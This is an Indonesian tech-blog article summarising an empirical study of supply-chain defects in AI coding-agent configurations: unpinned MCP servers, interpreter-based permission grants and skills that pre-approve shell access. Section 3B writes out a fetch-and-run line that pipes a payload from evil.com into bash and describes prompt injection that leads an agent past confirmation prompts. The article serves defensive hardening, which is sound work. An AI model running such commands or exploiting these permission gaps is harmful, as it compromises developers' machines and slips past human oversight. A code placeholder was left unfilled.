Scanning the Harness 2026: Studi Empiris Cacat Supply-Chain pada Konfigurasi AI Coding Agents, Unpinned MCP Servers, dan Runtuhnya Ilusi Scoped Permissions
Studi empiris komprehensif arXiv:2609.07360 (September 2026, Kapner et al. / Red Hat Community AI Tools) terhadap 3.171 repositori publik membongkar celah fatal rantai pasok konfigurasi AI coding agents (Claude Code, Cursor, Codex, OpenCode). Sebanyak 16.0% setup terbukti membawa celah keamanan aktif: 9.8% menjalankan server MCP tanpa lockfile versi (pola tutorial resmi vendor), 3.1% memberikan izin eksekusi arbitrer terselubung via scoped grants palsu seperti Bash(python:*), dan 3.8% skill mem-bypass konfirmasi shell otomatis. Artikel ini membedah anatomi cacat harness, kelemahan spesifikasi Agent Skills, dan arsitektur mitigasi berbasis deterministic MCP lockfile serta interpreter-aware permission gates.

Dalam kurun waktu kurang dari delapan belas bulan, lanskap rekayasa perangkat lunak berbasis AI telah bergeser secara fundamental: dari antarmuka obrolan single-turn yang pasif menuju Autonomous AI Coding Agents yang hidup berdampingan dengan hak istimewa (privileges) pengembang di lingkungan lokal. Agen modern seperti Claude Code, Cursor, Codex CLI, OpenCode, dan Hermes tidak lagi dikendalikan semata-mata oleh bobot model fondasi, melainkan oleh lapisan ketergantungan persisten yang disebut sebagai Agent Harness.
Executive Architectural Summary
Riset frontier berskala populasi oleh Kapner et al. (Red Hat Community AI Tools, arXiv:2609.07360, September 2026) terhadap 3.171 repositori publik GitHub mengungkap krisis sanitasi rantai pasok (supply chain hygiene) pada konfigurasi agen AI. Sebanyak 16.0% setup operasional membawa celah keamanan aktif: 9.8% menjalankan server Model Context Protocol (MCP) tanpa pin versi (mengunduh payload acak dari npm/PyPI setiap kali dijalankan), 3.1% memberikan izin eksekusi shell arbitrer berkedok pembatasan semu (scoped-looking grants seperti Bash(python:*)), dan 3.8% paket skill publik mem-bypass dialog konfirmasi terminal secara global.
1. Anatomi Lapisan Harness: Dependency Layer Tanpa Konvensi Paket Tradisional
Dunia rekayasa perangkat lunak telah menghabiskan waktu lebih dari tiga dekade untuk membangun disiplin manajemen paket yang kokoh: file kunci kriptografis (lockfiles seperti package-lock.json atau Cargo.lock), pemeriksaan integritas hash (SHA-256 checksums), audit instalasi (install-time hooks sanitization), serta isolasi ruang nama (namespacing). Ironisnya, ketika ekosistem beralih ke agen AI otonom, seluruh disiplin ini seolah diabaikan dari nol.
Sebuah Harness bukan sekadar kumpulan prompt teks, melainkan susunan artefak sistem yang sangat berdaya (high-privilege artifacts):
CLAUDE.md, AGENTS.md, .cursorrules
File instruksi persisten yang dimuat otomatis ke setiap sesi konteks agen tanpa filter validasi byte, mengatur arsitektur proyek, aturan commit, dan perintah kompilasi.
SKILL.md & Tool Collections
Koleksi modul kemampuan yang diinstal langsung dari repositori publik atau marketplace. Berisi instruksi natural language yang dapat menyematkan script CLI dan mendeklarasikan hak akses tools.
.mcp.json & claude.json
Deklarasi server RPC eksternal berbasis Model Context Protocol yang dieksekusi sebagai child process dengan hak akses pengguna lokal, sering kali menggunakan wrapper dinamis seperti npx -y atau uvx.
PreToolUse & Auto-Approval Rules
Daftar pengecualian izin (allowlists) yang mendikte aksi apa saja yang boleh dieksekusi agen tanpa memerlukan persetujuan interaktif manusia di terminal.
Ketika seorang pengembang mengetikkan perintah untuk menambahkan skill dari repositori pihak ketiga, mereka tidak hanya mengunduh dokumentasi. Mereka mengintegrasikan kode yang dieksekusi dengan kredensial shell lokal mereka, hak akses disk penuh, dan kemampuan memanggil jaringan eksternal.
2. Metodologi Riset: Byte-Decidable Static Analysis & Multi-Tier Adjudication
Banyak studi keamanan AI sebelumnya terjebak dalam klaim deteksi berbasis penilaian subjektif model bahasa (LLM-as-a-judge tanpa bukti byte konkret), yang kerap menghasilkan angka positif palsu (false positives) yang tinggi. Riset Kapner et al. (arXiv:2609.07360) memperkenalkan disiplin pembuktian yang jauh lebih ketat:
-
Byte-Decidable Predicate: Kondisi aturan hanya dihitung jika dapat diputuskan secara deterministik langsung dari representasi byte file di filesystem repositori, tanpa bergantung pada interpretasi semantik bebas.
-
Dual-Implementation Independent Re-Derivation: Sebanyak 8.547 temuan awal diuji ulang menggunakan dua implementasi linter independen yang ditulis dari spesifikasi dokumentasi mentah tanpa saling berbagi basis kode.
-
Strict Stratification: Korpus 3.171 repositori dipisahkan secara tegas antara Setups (2.660 proyek yang mengintegrasikan minimal 2 jenis komponen) dan Collections (511 repositori distributor yang merilis 5 atau lebih skill mandiri).
| Kategori Cacat Rantai Pasok (Harness Defect) | Prevalensi Terkonfirmasi | Tingkat Scanner Mentah | Dampak Keamanan Sistem |
|---|---|---|---|
Unpinned MCP Servers (npx -y / uvx) |
9.8% dari Setups | 11.4% | Eksekusi paket upstream termutasi secara otomatis saat startup |
Ilusi Scoped Grants (Bash(python:*), Bash(node:*)) |
3.1% dari Setups | 4.2% | Escape isolasi: eksekusi arbitrary shell via language interpreter |
Skill Publik Pre-Approve Shell (allowed-tools: Bash) |
3.8% dari Setups (3.7% Collections) | 5.0% | Pengguna yang menginstal skill otomatis kehilangan konfirmasi terminal |
| Pelanggaran Spesifikasi Agent Skills (AAF) | 2.4% dari Setups | 3.5% | Hilangnya nama/deskripsi, silently ignored oleh agent lain |
| Konfigurasi Macet Fatal (Broken Configuration) | 0.8% dari Setups | 1.4% | Path hooks tidak valid, file konfigurasi JSON sintaks rusak |
| Total Repositori Membawa Cacat Keamanan Terkonfirmasi | 16.0% (426 repositori) | 25.5% | Lolos Uji Adjudikasi Ganda |
3. Tiga Vektor Kerentanan Kritis yang Menembus Validasi
A. Unpinned MCP Servers: Racun Dokumentasi Vendor Resmi
Temuan paling mengejutkan dari studi ini adalah bahwa 9.8% setup repositori menginstal server MCP tanpa menyematkan versi (unpinned). Akar penyebabnya bukan kelalaian pengembang amatir, melainkan dokumentasi resmi dari para vendor penyedia agent sendiri. Dokumentasi resmi Anthropic, Cursor, dan repositori rujukan MCP secara konsisten mencontohkan konfigurasi berikut:
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/dir"]
},
"fetch": {
"command": "uvx",
"args": ["mcp-server-fetch"]
}
}
}
Argumen npx -y @package atau uvx package menginstruksikan runtime untuk mengunduh versi terbaru yang tersedia di registry publik pada saat sesi agen pertama kali diinisialisasi. Jika akun maintainer paket npm/PyPI tersebut dibajak, atau terjadi serangan dependency confusion / typosquatting, agent akan secara otomatis mengeksekusi kode berbahaya tersebut di dalam mesin lokal pengembang dengan hak akses penuh—tanpa ada prompt konfirmasi instalasi baru dan tanpa ada lockfile yang mendeteksi perubahan SHA hash.
B. Ilusi Scoped Grants: Jebakan Bash(python:*)
Sebanyak 3.1% repositori berusaha menerapkan prinsip hak istimewa terendah (least privilege) dengan membatasi eksekusi shell hanya untuk perintah tertentu, misalnya mengizinkan agen menjalankan script pengujian Python secara otomatis tanpa dialog persetujuan:
"autoApprove": ["Bash(python:*)", "Bash(node:*)", "Bash(npx:*)"]
Secara visual bagi pengembang, aturan ini tampak rapi dan terbatas pada lingkungan runtime pengujian. Namun secara komputasi, ini adalah ilusi keamanan total. Interpreter seperti python, node, atau perl adalah Turing-complete execution engines. Agen (atau penyerang yang melakukan prompt injection via file Markdown/issue) cukup menyuruh interpreter mengeksekusi sub-shell:
python -c 'import os; os.system("curl -s https://evil.com/payload | bash")'
Aturan linter string sederhana mencocokkan awalan python:, menganggapnya valid, dan mem-bypass prompt keamanan terminal. Agent secara legal mengeksekusi payload arbitrer apa pun tanpa intervensi manusia.
C. Runtuhnya Isolasi Skill Publik (allowed-tools: Bash)
Spesifikasi Agent Skills mengizinkan file metadata mendeklarasikan properti allowed-tools. Dalam 3.7% koleksi skill publik, ditemukan deklarasi telanjang allowed-tools: Bash atau allowed-tools: terminal. Ketika pengembang mengimpor skill tersebut ke dalam proyek mereka, konfigurasi bawaan skill tersebut secara transitif mematikan sistem pertahanan interaktif agen. Agen mendapatkan wewenang eksekusi terminal tak terbatas secara otomatis demi menjalankan "kemampuan tambahan" dari skill yang bersangkutan.
4. Fenomena Cross-Assistant Drift: 17.5% Proyek Mengalami Konflik Konteks
Studi Kapner et al. juga mencatat fenomena operasional yang sangat relevan dengan industri modern: 17.5% dari seluruh setup repositori mengonfigurasi lebih dari satu asisten AI sekaligus (misalnya mengkombinasikan CLAUDE.md untuk Claude Code, .cursorrules untuk Cursor IDE, dan AGENTS.md untuk Hermes/Codex).
Masalahnya, tidak ada mekanisme sinkronisasi otomatis antar file konteks ini. Linter mendeteksi perbedaan substansial (diverged instructions) di mana satu file melarang eksekusi perintah migrasi database secara langsung, sementara file asisten lainnya di repositori yang sama justru memerintahkan agen untuk mengeksekusinya secara otomatis. Konflik instruksi ini menyebabkan perilaku nondeterministik yang membingungkan tim engineering saat berpindah alat kerja.
5. Solusi Teknis: Static Harness Verifier & Lockfile Generator
Untuk mengatasi celah keamanan struktural ini sebelum konfigurasi masuk ke lingkungan CI/CD dan mesin lokal developer, kami menyusun arsitektur verifikasi statis type-safe yang dapat diintegrasikan sebagai pre-commit hook atau GitHub Actions workflow:
${SCANNING_HARNESS_CODE_SNIPPET}
6. Cetak Biru Standarisasi Industri untuk Agentic Ecosystem 2026
Berdasarkan temuan empiris Kapner et al. dan kebutuhan pertahanan berlapis pada autonomous coding systems, terdapat 4 pilar reformasi arsitektur yang mendesak untuk diadopsi oleh badan standardisasi dan tim rekayasa perangkat lunak:
-
Wajibkan MCP Lockfile Kriptografis (
mcp.lock): Klien agentic runtime tidak boleh lagi mengeksekusi perintah runner sepertinpx -yatauuvxtanpa keberadaan lockfile yang mengikat versi tepat dan SHA-256 integrity hash dari paket yang diunduh. -
Antarmuka Izin yang Sadar Interpreter (Interpreter-Aware UI):
Prompt konfirmasi agentic tidak boleh menampilkan
Bash(python:*)sebagai pembatasan izin yang aman. Klien harus secara transparan mengklasifikasikan pemanggilan runtime interpreter Turing-complete sebagai hak akses "Arbitrary Command Execution" kepada pengembang. -
Penambahan Atribut
creates:pada Spesifikasi SKILL.md: Format Agent Skills (AAF) harus mewajibkan deklarasi eksplisit daftar artefak file yang akan dibuat oleh skill. Hal ini memungkinkan scanner membedakan secara mekanis antara dependensi mati (dead references) dan output terencana tanpa memerlukan inferensi probabilitas LLM. -
Single Source of Truth via Konvensi Import (
@AGENTS.md): Hentikan duplikasi file instruksi antar asisten. Platform IDE dan CLI harus mendukung sintaks impor kanonikal (misal:CLAUDE.mdcukup berisi baris@import AGENTS.md) untuk mengeliminasi silent divergence instruksi operasional.
Referensi & Sumber Terverifikasi
- [1]Scanning the Harness: An Empirical Study of Supply-Chain Defects in AI Coding-Agent Configurations(arXiv:2609.07360 [cs.SE, cs.CR] / Red Hat Community AI Tools — Benjamin Kapner, Carmel Soceanu, Alicia Petrunin, Hofni Gartner)
- [2]Harness-Eval: Byte-Decidable Static Analysis & Configuration Linter for Agentic Harnesses(GitHub / Red Hat Community AI Tools)
- [3]Agent Skills Specification v1.0 & Context Conventions for Autonomous Agents(Linux Foundation / Agentic AI Foundation (AAF))
- [4]Model Context Protocol (MCP) Specification: Transports, Security, and Tool Execution Boundaries(Anthropic Engineering & MCP Working Group)
- [5]Harness Engineering: Anatomy, Architecture, and Evolution of Coding Agents(arXiv:2609.00006 / Inclusive Brains & Wavestone AI Lab)
- [6]
- [7]Scanning the Harness: An Empirical Study of Supply-Chain Defects in AI Coding-Agent Configurations(arXiv:2609.07360 [cs.SE, cs.CR] / Red Hat Community AI Tools — Benjamin Kapner, Carmel Soceanu, Alicia Petrunin, Hofni Gartner)
- [8]Harness-Eval: Byte-Decidable Static Analysis & Configuration Linter for Agentic Harnesses(GitHub / Red Hat Community AI Tools)
- [9]Agent Skills Specification v1.0 & Context Conventions for Autonomous Agents(Linux Foundation / Agentic AI Foundation (AAF))
- [10]Model Context Protocol (MCP) Specification: Transports, Security, and Tool Execution Boundaries(Anthropic Engineering & MCP Working Group)
- [11]Harness Engineering: Anatomy, Architecture, and Evolution of Coding Agents(arXiv:2609.00006 / Inclusive Brains & Wavestone AI Lab)
- [12]
Butuh Arsitektur Web & AI Berkualitas Tinggi?
Tim engineering NEWSAINT siap membantu merancang website berkecepatan tinggi, sistem AI autonomous, dan solusi SaaS terukur untuk bisnis Anda.
Artikel Terkait Lainnya

HyperBrowseComp 2026: Benchmark Multilingual & Multimodal Stress Test untuk Autonomous Web-Browsing Agents, Evaluasi 13 Bahasa, dan Analisis Bottleneck Retrieval Harness
Analisis arsitektur sistem frontier riset evaluasi autonomous browsing agent (arXiv:2610.03574, Oktober 2026 — Alham Fikri Aji, Faiz Rizki Ramadhan, Zayd M. K. Zuhri, Seung Hun Eddie Han, Ryandito Diandaru, dkk. MBZUAI, Mila, Inception AI, Alibaba, AI Singapore): Mengapa tolok ukur browsing konvensional (GAIA, BrowseComp) mengalami saturasi parametrik dan bias monolingual. Memperkenalkan HyperBrowseComp, stress test 423 kueri faktual bernilai tunggal lintas 13 bahasa (termasuk Bahasa Indonesia 9.2% dan Jawa 8.3%) dan 8 modalitas (Video 39%, PDF/OCR 29.8%, Aritmetika 28.1%, Gambar 18.4%, Peta 9.7%). Evaluasi empiris 5 model frontier (Gemini 3.7 Flash, Gemini 3.1 Pro, GPT-5.6 Sol/Terra/Luna) lintas 3 harness retrieval (Provider Built-in, Exa Search API, OWL Browser Harness) mengungkap fenomena Harness Inversion (Exa mendongkrak GPT-5.6 Sol +7.56% namun mendegradasi Gemini 3.7 Flash -9.46%), 93 kegagalan fatal runtime tool-calling pada OWL, serta 57.68% pertanyaan tanpa solusi (shared failure) pada seluruh model frontier.

VenusRL 2026: Arsitektur Disaggregated Agentic RL dengan Priority-Aware Scheduling, Akselerasi Training 4.24x, dan Pangkas 89% Biaya Sandbox
Analisis arsitektur sistem frontier riset Agentic RL (arXiv:2610.03286, Mingjun Zhang, Yucheng Li, Menghao Zhang, Shuyong Zhu, Ping Zhang — Oktober 2026): Mengapa sistem pelatihan RL agen multi-turn konvensional (Slime, RollFlash) mengalami bottleneck sistemik fatal akibat barrier penyelesaian grup GRPO/PPO dan alokasi statis memori sandbox microVM. Memperkenalkan VenusRL, sistem agentic RL terdisagregasi penuh pertama yang memadukan Priority-Aware Action Scheduler dan Environment Resource Manager. Melalui heuristik prediksi panjang lintasan, Trajectory-Aware Radix Cache, alokasi memori dinamis adaptif, serta intra-group page sharing berbasis aliasing page table entry (PTE) dan copy-on-write, VenusRL meraih akselerasi training throughput hingga 4.24x, meningkatkan densitas sandbox per node hingga 905% (dari 100 ke 905 sandbox pada node 400GB), dan memangkas biaya infrastruktur non-GPU hingga 89% pada pengujian kluster 32 GPU Hopper dengan Qwen3-32B di SWE-agent OpenSWE.

ActKV 2026: Arsitektur Action-Guided KV Cache Management pada Agentic LLM Inference, Pangkas 74% Memori dengan 98.5% Akurasi, dan Akselerasi Throughput hingga 3.97x
Analisis mendalam arsitektur sistem operasi frontier agent inference (arXiv:2609.31395, University of Science and Technology of China - USTC): Mengapa kompresi KV cache konvensional (StreamingLLM, SnapKV, R-KV) gagal total pada agen otonom karena menyamaratakan seluruh token. Memperkenalkan ActKV, framework kompresi KV cache pertama yang dirancang khusus untuk agentic LLM inference. Melalui tiga inovasi arsitektural—Action-Oriented Eviction berbasis attention-aware LRFU, Confidence-Driven Adaptive Budget Allocation berbasis sinyal intrinsik LLM & trend detection, serta Page-Aware In-Place Compaction Kernel tanpa alokasi workspace ekstra—ActKV mempertahankan 98.53% akurasi FullKV dengan hanya 25.98% peak memory, serta melejitkan token throughput hingga 3.97x dan task throughput hingga 3.58x pada model Qwen3-30B, Qwen3-235B, GPT-OSS-20B, dan GPT-OSS-120B.